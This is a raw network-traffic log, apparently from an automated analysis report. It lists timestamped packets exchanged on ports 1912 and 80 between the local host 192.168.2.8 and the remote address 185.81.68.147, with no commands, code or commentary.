                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519243002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519251108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519501925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519510984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519644976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519654036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519783974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519987106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520068884 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520077944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520114899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520124912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520381927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520390987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520400047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520407915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520440102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520448923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520457029 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520538092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520546913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520560980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520591021 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520600080 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520606995 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520615101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520731926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520740032 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520747900 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520817995 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520828009 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520837069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520847082 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520965099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520973921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520983934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521043062 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521136999 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521146059 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521182060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521281958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521290064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521398067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521472931 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521481037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521506071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521558046 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521605968 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521656036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521665096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521739006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.521748066 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.522021055 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.522121906 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525387049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525410891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525659084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525667906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525700092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525754929 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525871038 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525880098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.525998116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526092052 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526101112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526108980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526119947 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526237965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526292086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526412964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526421070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526431084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526501894 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526510954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526621103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526629925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526653051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526664019 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526701927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526808977 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526818037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526825905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.526926994 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527018070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527028084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527038097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527108908 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527117014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527159929 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527168989 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527250051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527257919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527291059 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527308941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527388096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527395964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527515888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527524948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527601004 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527682066 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527693033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527703047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527720928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527729034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527873039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527888060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527934074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.527987003 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.528297901 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.528367043 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.531795979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.531809092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.532017946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.532109976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.532202005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.532355070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.533133030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.533145905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.533240080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.534169912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.534183979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.534301996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.535147905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.535164118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.535257101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.535990000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.536075115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.536412954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.537045002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.537503958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.537714005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.538043022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.538054943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.538666964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.538937092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.538949013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.539336920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.539885998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.539896965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.540011883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.540699005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.540823936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.541827917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.541840076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.541866064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.542653084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.542695999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.542850971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.543101072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.543661118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.543672085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.544456005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.544497967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545384884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545532942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545543909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545712948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546479940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546490908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546776056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.547646999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.547658920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548022032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548415899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548429012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.549272060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.549288988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550065041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550184965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550210953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550328970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550676107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551280975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551291943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551438093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552114964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552387953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552500963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553185940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553196907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553543091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554203987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554214954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554641962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555131912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555143118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555339098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556006908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556088924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556529045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557002068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557013035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557169914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557840109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558068991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558718920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558850050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559003115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559755087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559883118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559910059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560120106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560787916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560798883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560970068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.561743021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.561754942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562019110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562611103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562844992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563049078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563599110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563611031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563690901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564766884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564778090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564858913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565443039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565572977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565713882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566382885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566560984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566751003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567361116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567584038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567708015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568389893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568401098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568559885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569297075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569309950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569515944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.570310116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.570324898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571264982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571284056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571346998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571448088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572192907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572335958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572422981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573050976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573225021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573365927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574099064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574111938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574244976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.575016022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.575099945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.575252056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.576034069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.576052904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.576217890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.577168941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.577313900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.577999115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.578010082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.578026056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.578373909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.579114914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.579176903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.579256058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.579768896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.579945087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.580506086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.580811024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.580823898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.581223965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.581729889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.629225016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642064095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642081022 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642184019 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642211914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642317057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642328024 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642379999 CET191249710185.81.68.147192.168.2.8
